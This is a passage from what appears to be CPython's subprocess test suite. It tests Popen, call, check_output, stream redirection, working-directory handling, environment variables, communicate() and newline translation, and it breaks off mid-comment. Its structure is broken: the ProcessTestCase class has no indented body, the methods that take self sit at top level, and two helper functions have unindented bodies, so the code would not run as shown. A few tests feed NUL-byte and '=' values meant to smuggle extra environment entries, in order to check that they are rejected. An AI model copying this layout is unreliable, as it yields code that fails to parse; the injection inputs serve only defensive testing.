    def assertStderrEqual(self, stderr, expected, msg=None):
        # In a debug build, stuff like "[6580 refs]" is printed to stderr at
        # shutdown time.  That frustrates tests trying to check stderr produced
        # from a spawned Python process.
        actual = support.strip_python_stderr(stderr)
        # strip_python_stderr also strips whitespace, so we do too.
        expected = expected.strip()
        self.assertEqual(actual, expected, msg)
class PopenTestException(Exception):
    # Raised deliberately by PopenExecuteChildRaises to simulate a
    # failure inside Popen._execute_child.
    pass
class PopenExecuteChildRaises(subprocess.Popen):
    """Popen subclass for testing cleanup of subprocess.PIPE filehandles when
    _execute_child fails.
    """
    def _execute_child(self, *args, **kwargs):
        # Fail before any child is spawned so tests can verify that the
        # pipe file handles created by __init__ do not leak.
        raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
    # Without bufsize=0 the pipe wrappers must be buffered streams.
    proc = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
                            stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE)
    try:
        self.assertIsInstance(proc.stdin, io.BufferedIOBase)
        self.assertIsInstance(proc.stdout, io.BufferedIOBase)
        self.assertIsInstance(proc.stderr, io.BufferedIOBase)
    finally:
        proc.stdin.close()
        proc.stdout.close()
        proc.stderr.close()
        proc.wait()
def test_io_unbuffered_works(self):
    # bufsize=0 must yield raw (unbuffered) pipe streams.
    proc = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
                            stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE, bufsize=0)
    try:
        self.assertIsInstance(proc.stdin, io.RawIOBase)
        self.assertIsInstance(proc.stdout, io.RawIOBase)
        self.assertIsInstance(proc.stderr, io.RawIOBase)
    finally:
        proc.stdin.close()
        proc.stdout.close()
        proc.stderr.close()
        proc.wait()
def test_call_seq(self):
    # call() with a sequence argument returns the child's exit status.
    status = subprocess.call([sys.executable, "-c",
                              "import sys; sys.exit(47)"])
    self.assertEqual(status, 47)
def test_call_timeout(self):
    # The child must be killed once the timeout expires; otherwise this
    # call would deadlock, since subprocess.call waits for the child.
    with self.assertRaises(subprocess.TimeoutExpired):
        subprocess.call([sys.executable, "-c", "while True: pass"],
                        timeout=0.1)
def test_check_call_zero(self):
    # check_call() returns 0 when the child exits successfully.
    status = subprocess.check_call([sys.executable, "-c",
                                    "import sys; sys.exit(0)"])
    self.assertEqual(status, 0)
def test_check_call_nonzero(self):
    # A non-zero exit status turns into CalledProcessError.
    with self.assertRaises(subprocess.CalledProcessError) as cm:
        subprocess.check_call([sys.executable, "-c",
                               "import sys; sys.exit(47)"])
    self.assertEqual(cm.exception.returncode, 47)
def test_check_output(self):
    # check_output() captures the child's stdout on success.
    out = subprocess.check_output(
        [sys.executable, "-c", "print('BDFL')"])
    self.assertIn(b'BDFL', out)
def test_check_output_nonzero(self):
    # check_output() raises CalledProcessError on non-zero exit.
    with self.assertRaises(subprocess.CalledProcessError) as cm:
        subprocess.check_output(
            [sys.executable, "-c", "import sys; sys.exit(5)"])
    self.assertEqual(cm.exception.returncode, 5)
def test_check_output_stderr(self):
    # stderr=STDOUT folds the child's stderr into the captured output.
    out = subprocess.check_output(
        [sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
        stderr=subprocess.STDOUT)
    self.assertIn(b'BDFL', out)
def test_check_output_stdout_arg(self):
    # Passing stdout= to check_output() is rejected with ValueError.
    with self.assertRaises(ValueError) as cm:
        subprocess.check_output(
            [sys.executable, "-c", "print('will not be run')"],
            stdout=sys.stdout)
        self.fail("Expected ValueError when stdout arg supplied.")
    self.assertIn('stdout', cm.exception.args[0])
def test_check_output_timeout(self):
    # On timeout the partial output is attached to the exception.
    with self.assertRaises(subprocess.TimeoutExpired) as cm:
        subprocess.check_output(
            [sys.executable, "-c",
             "import sys, time\n"
             "sys.stdout.write('BDFL')\n"
             "sys.stdout.flush()\n"
             "time.sleep(3600)"],
            # Some heavily loaded buildbots (sparc Debian 3.x) require
            # this much time to start and print.
            timeout=3)
        self.fail("Expected TimeoutExpired.")
    self.assertEqual(cm.exception.output, b'BDFL')
def test_call_kwargs(self):
    # Keyword args (env= here) are forwarded from call() to Popen.
    child_env = os.environ.copy()
    child_env["FRUIT"] = "banana"
    status = subprocess.call([sys.executable, "-c",
                              'import sys, os;'
                              'sys.exit(os.getenv("FRUIT")=="banana")'],
                             env=child_env)
    self.assertEqual(status, 1)
def test_invalid_args(self):
    # Popen() called with invalid arguments should raise TypeError
    # but Popen.__del__ should not complain (issue #12085)
    with support.captured_stderr() as captured:
        self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
        argcount = subprocess.Popen.__init__.__code__.co_argcount
        too_many_args = [0] * (argcount + 1)
        self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
    self.assertEqual(captured.getvalue(), '')
def test_stdin_none(self):
    # .stdin stays None when stdin is not redirected.
    proc = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
                            stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    self.addCleanup(proc.stdout.close)
    self.addCleanup(proc.stderr.close)
    proc.wait()
    self.assertEqual(proc.stdin, None)
def test_stdout_none(self):
    # .stdout is None when not redirected, and the child's stdout is
    # inherited from the parent.  We exercise this with a subprocess in
    # a subprocess:
    #   this_test
    #   \-- subprocess created by this test (parent)
    #       \-- subprocess created by the parent subprocess (child)
    # The parent doesn't specify stdout, so the child uses the parent's
    # stdout; the child's message must therefore reach the parent's
    # stdout, and the parent asserts that its own child.stdout is None.
    # See #11963.
    code = ('import sys; from subprocess import Popen, PIPE;'
            'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
            ' stdin=PIPE, stderr=PIPE);'
            'p.wait(); assert p.stdout is None;')
    proc = subprocess.Popen([sys.executable, "-c", code],
                            stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    self.addCleanup(proc.stdout.close)
    self.addCleanup(proc.stderr.close)
    out, err = proc.communicate()
    self.assertEqual(proc.returncode, 0, err)
    self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
    # .stderr stays None when stderr is not redirected.
    proc = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
                            stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    self.addCleanup(proc.stdout.close)
    self.addCleanup(proc.stdin.close)
    proc.wait()
    self.assertEqual(proc.stderr, None)
def _assert_python(self, pre_args, **kwargs):
    # We include sys.exit() to prevent the test runner from hanging
    # whenever python is found.
    proc = subprocess.Popen(pre_args + ["import sys; sys.exit(47)"], **kwargs)
    proc.wait()
    self.assertEqual(47, proc.returncode)
def test_executable(self):
    # Check that the executable argument works.
    #
    # On Unix (non-Mac and non-Windows), Python looks at args[0] to
    # determine where its standard library is, so we need the directory
    # of args[0] to be valid for the Popen() call to Python to succeed.
    # See also issue #16170 and issue #7774.
    missing = os.path.join(os.path.dirname(sys.executable),
                           "doesnotexist")
    self._assert_python([missing, "-c"], executable=sys.executable)
def test_executable_takes_precedence(self):
    # executable= wins over args[0].  Verify first that the call
    # succeeds without the executable arg at all.
    base_args = [sys.executable, "-c"]
    self._assert_python(base_args)
    self.assertRaises(FileNotFoundError, self._assert_python, base_args,
                      executable="doesnotexist")
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
    # With shell=True, executable= replaces the default shell.
    self._assert_python([], executable=sys.executable, shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
original_cwd = os.getcwd()
os.chdir(cwd)
cwd = os.getcwd()
os.chdir(original_cwd)
return cwd
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
    # Invoke Python via Popen, and assert that (1) the call succeeds,
    # and that (2) the current working directory of the child process
    # matches *expected_cwd*.
    proc = subprocess.Popen([python_arg, "-c",
                             "import os, sys; "
                             "sys.stdout.write(os.getcwd()); "
                             "sys.exit(47)"],
                            stdout=subprocess.PIPE,
                            **kwargs)
    self.addCleanup(proc.stdout.close)
    proc.wait()
    self.assertEqual(47, proc.returncode)
    normcase = os.path.normcase
    self.assertEqual(normcase(expected_cwd),
                     normcase(proc.stdout.read().decode("utf-8")))
def test_cwd(self):
    # cwd= changes the working directory of the child process.
    expected = self._normalize_cwd(tempfile.gettempdir())
    self._assert_cwd(expected, sys.executable, cwd=expected)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
    # Popen looks for a relative args[0] relative to cwd.
    python_dir, python_base = self._split_python_path()
    rel_python = os.path.join(os.curdir, python_base)
    with support.temp_cwd() as wrong_dir:
        # Before calling with the correct cwd, confirm that the call
        # fails both without cwd and with the wrong cwd.
        self.assertRaises(FileNotFoundError, subprocess.Popen,
                          [rel_python])
        self.assertRaises(FileNotFoundError, subprocess.Popen,
                          [rel_python], cwd=wrong_dir)
        python_dir = self._normalize_cwd(python_dir)
        self._assert_cwd(python_dir, rel_python, cwd=python_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
    # Popen resolves a relative executable= against cwd, and
    # executable= takes precedence over args[0].
    python_dir, python_base = self._split_python_path()
    rel_python = os.path.join(os.curdir, python_base)
    doesntexist = "somethingyoudonthave"
    with support.temp_cwd() as wrong_dir:
        # The call must fail both without cwd and with the wrong cwd.
        self.assertRaises(FileNotFoundError, subprocess.Popen,
                          [doesntexist], executable=rel_python)
        self.assertRaises(FileNotFoundError, subprocess.Popen,
                          [doesntexist], executable=rel_python,
                          cwd=wrong_dir)
        python_dir = self._normalize_cwd(python_dir)
        self._assert_cwd(python_dir, doesntexist, executable=rel_python,
                         cwd=python_dir)
def test_cwd_with_absolute_arg(self):
    # An absolute args[0] is found even when cwd is wrong.
    python_dir, python_base = self._split_python_path()
    abs_python = os.path.join(python_dir, python_base)
    rel_python = os.path.join(os.curdir, python_base)
    with script_helper.temp_dir() as wrong_dir:
        # First prove that a relative path fails from this directory.
        self.assertRaises(FileNotFoundError, subprocess.Popen,
                          [rel_python], cwd=wrong_dir)
        wrong_dir = self._normalize_cwd(wrong_dir)
        self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
                 'Test is not venv-compatible')
def test_executable_with_cwd(self):
    # executable= plus cwd= locates the interpreter even when args[0]
    # is bogus.
    python_dir, python_base = self._split_python_path()
    python_dir = self._normalize_cwd(python_dir)
    self._assert_cwd(python_dir, "somethingyoudonthave",
                     executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
                 'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
                 "need an installed Python. See #7774")
def test_executable_without_cwd(self):
    # For a normal installation, executable= should work without the
    # cwd= argument.  For test runs in the build directory, see #7774.
    self._assert_cwd(os.getcwd(), "somethingyoudonthave",
                     executable=sys.executable)
def test_stdin_pipe(self):
    # stdin redirected to a pipe; the exit code reflects what was read.
    proc = subprocess.Popen([sys.executable, "-c",
                             'import sys; sys.exit(sys.stdin.read() == "pear")'],
                            stdin=subprocess.PIPE)
    proc.stdin.write(b"pear")
    proc.stdin.close()
    proc.wait()
    self.assertEqual(proc.returncode, 1)
def test_stdin_filedes(self):
    # stdin is set to an open file descriptor.
    tmpf = tempfile.TemporaryFile()
    self.addCleanup(tmpf.close)
    fd = tmpf.fileno()
    os.write(fd, b"pear")
    os.lseek(fd, 0, 0)
    proc = subprocess.Popen([sys.executable, "-c",
                             'import sys; sys.exit(sys.stdin.read() == "pear")'],
                            stdin=fd)
    proc.wait()
    self.assertEqual(proc.returncode, 1)
def test_stdin_fileobj(self):
    # stdin is set to an open file object.
    tmpf = tempfile.TemporaryFile()
    self.addCleanup(tmpf.close)
    tmpf.write(b"pear")
    tmpf.seek(0)
    proc = subprocess.Popen([sys.executable, "-c",
                             'import sys; sys.exit(sys.stdin.read() == "pear")'],
                            stdin=tmpf)
    proc.wait()
    self.assertEqual(proc.returncode, 1)
def test_stdout_pipe(self):
    # stdout redirected to a pipe.
    proc = subprocess.Popen([sys.executable, "-c",
                             'import sys; sys.stdout.write("orange")'],
                            stdout=subprocess.PIPE)
    self.addCleanup(proc.stdout.close)
    self.assertEqual(proc.stdout.read(), b"orange")
def test_stdout_filedes(self):
    # stdout is set to an open file descriptor.
    tmpf = tempfile.TemporaryFile()
    self.addCleanup(tmpf.close)
    fd = tmpf.fileno()
    proc = subprocess.Popen([sys.executable, "-c",
                             'import sys; sys.stdout.write("orange")'],
                            stdout=fd)
    proc.wait()
    os.lseek(fd, 0, 0)
    self.assertEqual(os.read(fd, 1024), b"orange")
def test_stdout_fileobj(self):
    # stdout is set to an open file object.
    tmpf = tempfile.TemporaryFile()
    self.addCleanup(tmpf.close)
    proc = subprocess.Popen([sys.executable, "-c",
                             'import sys; sys.stdout.write("orange")'],
                            stdout=tmpf)
    proc.wait()
    tmpf.seek(0)
    self.assertEqual(tmpf.read(), b"orange")
def test_stderr_pipe(self):
    # stderr redirected to a pipe.
    proc = subprocess.Popen([sys.executable, "-c",
                             'import sys; sys.stderr.write("strawberry")'],
                            stderr=subprocess.PIPE)
    self.addCleanup(proc.stderr.close)
    self.assertStderrEqual(proc.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
    # stderr is set to an open file descriptor.
    tmpf = tempfile.TemporaryFile()
    self.addCleanup(tmpf.close)
    fd = tmpf.fileno()
    proc = subprocess.Popen([sys.executable, "-c",
                             'import sys; sys.stderr.write("strawberry")'],
                            stderr=fd)
    proc.wait()
    os.lseek(fd, 0, 0)
    self.assertStderrEqual(os.read(fd, 1024), b"strawberry")
def test_stderr_fileobj(self):
    # stderr is set to an open file object.
    tmpf = tempfile.TemporaryFile()
    self.addCleanup(tmpf.close)
    proc = subprocess.Popen([sys.executable, "-c",
                             'import sys; sys.stderr.write("strawberry")'],
                            stderr=tmpf)
    proc.wait()
    tmpf.seek(0)
    self.assertStderrEqual(tmpf.read(), b"strawberry")
def test_stdout_stderr_pipe(self):
    # stdout and stderr are captured into the same pipe.
    proc = subprocess.Popen([sys.executable, "-c",
                             'import sys;'
                             'sys.stdout.write("apple");'
                             'sys.stdout.flush();'
                             'sys.stderr.write("orange")'],
                            stdout=subprocess.PIPE,
                            stderr=subprocess.STDOUT)
    self.addCleanup(proc.stdout.close)
    self.assertStderrEqual(proc.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
    # stdout and stderr are captured into the same open file.
    tmpf = tempfile.TemporaryFile()
    self.addCleanup(tmpf.close)
    proc = subprocess.Popen([sys.executable, "-c",
                             'import sys;'
                             'sys.stdout.write("apple");'
                             'sys.stdout.flush();'
                             'sys.stderr.write("orange")'],
                            stdout=tmpf,
                            stderr=tmpf)
    proc.wait()
    tmpf.seek(0)
    self.assertStderrEqual(tmpf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
    # stdout is set to the integer 1 (#1531862).  To keep the text off
    # the real stdout we nest subprocesses as in test_stdout_none: the
    # parent passes stdout=1 to its child while this test captures the
    # parent's output with stdout=PIPE.  See #11963.
    code = ('import sys, subprocess; '
            'rc = subprocess.call([sys.executable, "-c", '
            '    "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
            'b\'test with stdout=1\'))"], stdout=1); '
            'assert rc == 18')
    proc = subprocess.Popen([sys.executable, "-c", code],
                            stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    self.addCleanup(proc.stdout.close)
    self.addCleanup(proc.stderr.close)
    out, err = proc.communicate()
    self.assertEqual(proc.returncode, 0, err)
    self.assertEqual(out.rstrip(), b'test with stdout=1')
def test_stdout_devnull(self):
    # DEVNULL discards the child's stdout; .stdout stays None.
    proc = subprocess.Popen([sys.executable, "-c",
                             'for i in range(10240):'
                             'print("x" * 1024)'],
                            stdout=subprocess.DEVNULL)
    proc.wait()
    self.assertEqual(proc.stdout, None)
def test_stderr_devnull(self):
    # DEVNULL discards the child's stderr; .stderr stays None.
    proc = subprocess.Popen([sys.executable, "-c",
                             'import sys\n'
                             'for i in range(10240):'
                             'sys.stderr.write("x" * 1024)'],
                            stderr=subprocess.DEVNULL)
    proc.wait()
    self.assertEqual(proc.stderr, None)
def test_stdin_devnull(self):
    # DEVNULL gives the child an empty stdin; .stdin stays None.
    proc = subprocess.Popen([sys.executable, "-c",
                             'import sys;'
                             'sys.stdin.read(1)'],
                            stdin=subprocess.DEVNULL)
    proc.wait()
    self.assertEqual(proc.stdin, None)
def test_env(self):
    # env= replaces the child's environment wholesale.
    child_env = os.environ.copy()
    child_env["FRUIT"] = "orange"
    with subprocess.Popen([sys.executable, "-c",
                           'import sys,os;'
                           'sys.stdout.write(os.getenv("FRUIT"))'],
                          stdout=subprocess.PIPE,
                          env=child_env) as proc:
        stdout, stderr = proc.communicate()
        self.assertEqual(stdout, b"orange")
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
                 'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') is not None,
                 'the python library cannot be loaded '
                 'with an empty environment')
def test_empty_env(self):
    # env={} yields an (almost) empty child environment.
    with subprocess.Popen([sys.executable, "-c",
                           'import os; '
                           'print(list(os.environ.keys()))'],
                          stdout=subprocess.PIPE,
                          env={}) as proc:
        stdout, stderr = proc.communicate()
        # Mac OS X adds __CF_USER_TEXT_ENCODING even to an empty
        # environment.
        self.assertIn(stdout.strip(),
                      (b"[]",
                       b"['__CF_USER_TEXT_ENCODING']"))
def test_invalid_cmd(self):
    # A null character in the command name is rejected.
    cmd = sys.executable + '\0'
    with self.assertRaises((ValueError, TypeError)):
        subprocess.Popen([cmd, "-c", "pass"])
    # A null character in a command argument is rejected too.
    with self.assertRaises((ValueError, TypeError)):
        subprocess.Popen([sys.executable, "-c", "pass#\0"])
def test_invalid_env(self):
    # NUL bytes and misplaced '=' in environment entries must be rejected;
    # an '=' inside a *value* is legal and must pass through unchanged.
    # null character in the environment variable name
    newenv = os.environ.copy()
    newenv["FRUIT\0VEGETABLE"] = "cabbage"
    with self.assertRaises((ValueError, TypeError)):
        subprocess.Popen([sys.executable, "-c", "pass"], env=newenv)
    # null character in the environment variable value
    newenv = os.environ.copy()
    newenv["FRUIT"] = "orange\0VEGETABLE=cabbage"
    with self.assertRaises((ValueError, TypeError)):
        subprocess.Popen([sys.executable, "-c", "pass"], env=newenv)
    # equal character in the environment variable name
    newenv = os.environ.copy()
    newenv["FRUIT=ORANGE"] = "lemon"
    with self.assertRaises(ValueError):
        subprocess.Popen([sys.executable, "-c", "pass"], env=newenv)
    # equal character in the environment variable value is allowed
    newenv = os.environ.copy()
    newenv["FRUIT"] = "orange=lemon"
    with subprocess.Popen([sys.executable, "-c",
                           'import sys, os;'
                           'sys.stdout.write(os.getenv("FRUIT"))'],
                          stdout=subprocess.PIPE,
                          env=newenv) as p:
        stdout, stderr = p.communicate()
        self.assertEqual(stdout, b"orange=lemon")
def test_communicate_stdin(self):
    # communicate(input) must deliver the bytes to the child's stdin.
    # The child exits with sys.exit(True) -> status 1 when it received
    # exactly b"pear".
    p = subprocess.Popen([sys.executable, "-c",
                          'import sys;'
                          'sys.exit(sys.stdin.read() == "pear")'],
                         stdin=subprocess.PIPE)
    p.communicate(b"pear")
    self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
    # Only stdout is piped: communicate() returns its contents and None
    # for the unredirected stderr.
    p = subprocess.Popen([sys.executable, "-c",
                          'import sys; sys.stdout.write("pineapple")'],
                         stdout=subprocess.PIPE)
    (stdout, stderr) = p.communicate()
    self.assertEqual(stdout, b"pineapple")
    self.assertEqual(stderr, None)
def test_communicate_stderr(self):
    # Only stderr is piped: communicate() returns None for stdout and the
    # captured stderr contents.
    p = subprocess.Popen([sys.executable, "-c",
                          'import sys; sys.stderr.write("pineapple")'],
                         stderr=subprocess.PIPE)
    (stdout, stderr) = p.communicate()
    self.assertEqual(stdout, None)
    self.assertStderrEqual(stderr, b"pineapple")
def test_communicate(self):
    # All three streams piped: input is echoed back on stdout while the
    # child also writes to stderr; communicate() must collect both.
    p = subprocess.Popen([sys.executable, "-c",
                          'import sys,os;'
                          'sys.stderr.write("pineapple");'
                          'sys.stdout.write(sys.stdin.read())'],
                         stdin=subprocess.PIPE,
                         stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE)
    self.addCleanup(p.stdout.close)
    self.addCleanup(p.stderr.close)
    self.addCleanup(p.stdin.close)
    (stdout, stderr) = p.communicate(b"banana")
    self.assertEqual(stdout, b"banana")
    self.assertStderrEqual(stderr, b"pineapple")
def test_communicate_timeout(self):
    # communicate(timeout=...) must raise TimeoutExpired while the child
    # is still running, and a subsequent communicate() must still return
    # the complete output.
    p = subprocess.Popen([sys.executable, "-c",
                          'import sys,os,time;'
                          'sys.stderr.write("pineapple\\n");'
                          'time.sleep(1);'
                          'sys.stderr.write("pear\\n");'
                          'sys.stdout.write(sys.stdin.read())'],
                         universal_newlines=True,
                         stdin=subprocess.PIPE,
                         stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE)
    self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
                      timeout=0.3)
    # Make sure we can keep waiting for it, and that we get the whole output
    # after it completes.
    (stdout, stderr) = p.communicate()
    self.assertEqual(stdout, "banana")
    self.assertStderrEqual(stderr.encode(), b"pineapple\npear\n")
# NOTE(review): "ouput" in the method name is a typo, but renaming would
# change the test id used by runners/buildbots, so it is kept as-is.
def test_communicate_timeout_large_ouput(self):
    # Test an expiring timeout while the child is outputting lots of data.
    # The retry after the timeout must still return all 4 chunks.
    p = subprocess.Popen([sys.executable, "-c",
                          'import sys,os,time;'
                          'sys.stdout.write("a" * (64 * 1024));'
                          'time.sleep(0.2);'
                          'sys.stdout.write("a" * (64 * 1024));'
                          'time.sleep(0.2);'
                          'sys.stdout.write("a" * (64 * 1024));'
                          'time.sleep(0.2);'
                          'sys.stdout.write("a" * (64 * 1024));'],
                         stdout=subprocess.PIPE)
    self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
    (stdout, _) = p.communicate()
    self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
    # Exercise every non-empty combination of piped streams and verify
    # communicate() closed each pipe it created.
    for stdin_pipe in (False, True):
        for stdout_pipe in (False, True):
            for stderr_pipe in (False, True):
                options = {}
                if stdin_pipe:
                    options['stdin'] = subprocess.PIPE
                if stdout_pipe:
                    options['stdout'] = subprocess.PIPE
                if stderr_pipe:
                    options['stderr'] = subprocess.PIPE
                if not options:
                    # no pipes at all -- nothing to check
                    continue
                p = subprocess.Popen((sys.executable, "-c", "pass"), **options)
                p.communicate()
                if p.stdin is not None:
                    self.assertTrue(p.stdin.closed)
                if p.stdout is not None:
                    self.assertTrue(p.stdout.closed)
                if p.stderr is not None:
                    self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
    # When no stream is redirected, communicate() yields (None, None).
    proc = subprocess.Popen([sys.executable, "-c",
                             "import sys; sys.exit(47)"])
    out, err = proc.communicate()
    self.assertIsNone(out)
    self.assertIsNone(err)
def test_communicate_pipe_buf(self):
    # communicate() with writes larger than pipe_buf
    # This test will probably deadlock rather than fail, if
    # communicate() does not work properly.
    # The pipe created and immediately closed here recycles low fd
    # numbers so the child's pipes land on recently-freed descriptors.
    x, y = os.pipe()
    os.close(x)
    os.close(y)
    p = subprocess.Popen([sys.executable, "-c",
                          'import sys,os;'
                          'sys.stdout.write(sys.stdin.read(47));'
                          'sys.stderr.write("x" * %d);'
                          'sys.stdout.write(sys.stdin.read())' %
                          support.PIPE_MAX_SIZE],
                         stdin=subprocess.PIPE,
                         stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE)
    self.addCleanup(p.stdout.close)
    self.addCleanup(p.stderr.close)
    self.addCleanup(p.stdin.close)
    string_to_write = b"a" * support.PIPE_MAX_SIZE
    (stdout, stderr) = p.communicate(string_to_write)
    self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
    # Data written directly to p.stdin before communicate() must be
    # delivered ahead of the communicate(input) bytes.
    p = subprocess.Popen([sys.executable, "-c",
                          'import sys,os;'
                          'sys.stdout.write(sys.stdin.read())'],
                         stdin=subprocess.PIPE,
                         stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE)
    self.addCleanup(p.stdout.close)
    self.addCleanup(p.stderr.close)
    self.addCleanup(p.stdin.close)
    p.stdin.write(b"banana")
    (stdout, stderr) = p.communicate(b"split")
    self.assertEqual(stdout, b"bananasplit")
    self.assertStderrEqual(stderr, b"")
def test_universal_newlines(self):
    # Text mode: data written to p.stdin is encoded, and \r\n / \r in the
    # child's output are translated to \n on read.  The child writes raw
    # bytes via sys.stdout.buffer so the exact line endings are controlled.
    p = subprocess.Popen([sys.executable, "-c",
                          'import sys,os;' + SETBINARY +
                          'buf = sys.stdout.buffer;'
                          'buf.write(sys.stdin.readline().encode());'
                          'buf.flush();'
                          'buf.write(b"line2\\n");'
                          'buf.flush();'
                          'buf.write(sys.stdin.read().encode());'
                          'buf.flush();'
                          'buf.write(b"line4\\n");'
                          'buf.flush();'
                          'buf.write(b"line5\\r\\n");'
                          'buf.flush();'
                          'buf.write(b"line6\\r");'
                          'buf.flush();'
                          'buf.write(b"\\nline7");'
                          'buf.flush();'
                          'buf.write(b"\\nline8");'],
                         stdin=subprocess.PIPE,
                         stdout=subprocess.PIPE,
                         # True, not the truthy literal 1 -- this is the
                         # documented value for the flag.
                         universal_newlines=True)
    p.stdin.write("line1\n")
    self.assertEqual(p.stdout.readline(), "line1\n")
    p.stdin.write("line3\n")
    p.stdin.close()
    self.addCleanup(p.stdout.close)
    self.assertEqual(p.stdout.readline(),
                     "line2\n")
    self.assertEqual(p.stdout.read(6),
                     "line3\n")
    self.assertEqual(p.stdout.read(),
                     "line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
    # universal newlines through communicate(): all newline flavours in
    # the child's raw output must be normalized to \n.
    p = subprocess.Popen([sys.executable, "-c",
                          'import sys,os;' + SETBINARY +
                          'buf = sys.stdout.buffer;'
                          'buf.write(b"line2\\n");'
                          'buf.flush();'
                          'buf.write(b"line4\\n");'
                          'buf.flush();'
                          'buf.write(b"line5\\r\\n");'
                          'buf.flush();'
                          'buf.write(b"line6\\r");'
                          'buf.flush();'
                          'buf.write(b"\\nline7");'
                          'buf.flush();'
                          'buf.write(b"\\nline8");'],
                         stderr=subprocess.PIPE,
                         stdout=subprocess.PIPE,
                         # True, not the truthy literal 1 -- this is the
                         # documented value for the flag.
                         universal_newlines=True)
    self.addCleanup(p.stdout.close)
    self.addCleanup(p.stderr.close)
    (stdout, stderr) = p.communicate()
    self.assertEqual(stdout,
                     "line2\nline4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate_stdin(self):
    # universal newlines through communicate(), with only stdin piped:
    # the str input must arrive encoded in the child, ending newlines
    # intact.  The child asserts on what it receives and exits 0.
    p = subprocess.Popen([sys.executable, "-c",
                          'import sys,os;' + SETBINARY + textwrap.dedent('''
                           s = sys.stdin.readline()
                           assert s == "line1\\n", repr(s)
                           s = sys.stdin.read()
                           assert s == "line3\\n", repr(s)
                          ''')],
                         stdin=subprocess.PIPE,
                         # True, not the truthy literal 1 -- this is the
                         # documented value for the flag.
                         universal_newlines=True)
    (stdout, stderr) = p.communicate("line1\nline3\n")
    self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
    # Test communicate(input=None) with universal newlines.
    #
    # We set stdout to PIPE because, as of this writing, a different
    # code path is tested when the number of pipes is zero or one.
    p = subprocess.Popen([sys.executable, "-c", "pass"],
                         stdin=subprocess.PIPE,
                         stdout=subprocess.PIPE,
                         universal_newlines=True)
    p.communicate()
    self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
    # universal newlines through communicate(), with stdin, stdout, stderr
    # all piped: newline translation must apply independently to the
    # captured stdout and stderr.
    p = subprocess.Popen([sys.executable, "-c",
                          'import sys,os;' + SETBINARY + textwrap.dedent('''
                           s = sys.stdin.buffer.readline()
                           sys.stdout.buffer.write(s)
                           sys.stdout.buffer.write(b"line2\\r")
                           sys.stderr.buffer.write(b"eline2\\n")
                           s = sys.stdin.buffer.read()
                           sys.stdout.buffer.write(s)
                           sys.stdout.buffer.write(b"line4\\n")
                           sys.stdout.buffer.write(b"line5\\r\\n")
                           sys.stderr.buffer.write(b"eline6\\r")
                           sys.stderr.buffer.write(b"eline7\\r\\nz")
                          ''')],
                         stdin=subprocess.PIPE,
                         stderr=subprocess.PIPE,
                         stdout=subprocess.PIPE,
                         universal_newlines=True)
    self.addCleanup(p.stdout.close)
    self.addCleanup(p.stderr.close)
    (stdout, stderr) = p.communicate("line1\nline3\n")
    self.assertEqual(p.returncode, 0)
    self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
    # Python debug build push something like "[42442 refs]\n"
    # to stderr at exit of subprocess.
    # Don't use assertStderrEqual because it strips CR and LF from output.
    self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
def test_universal_newlines_communicate_encodings(self):
    # Check that universal newlines mode works for various encodings,
    # in particular for encodings in the UTF-16 and UTF-32 families.
    # See issue #15595.
    #
    # UTF-16 and UTF-32-BE are sufficient to check both with BOM and
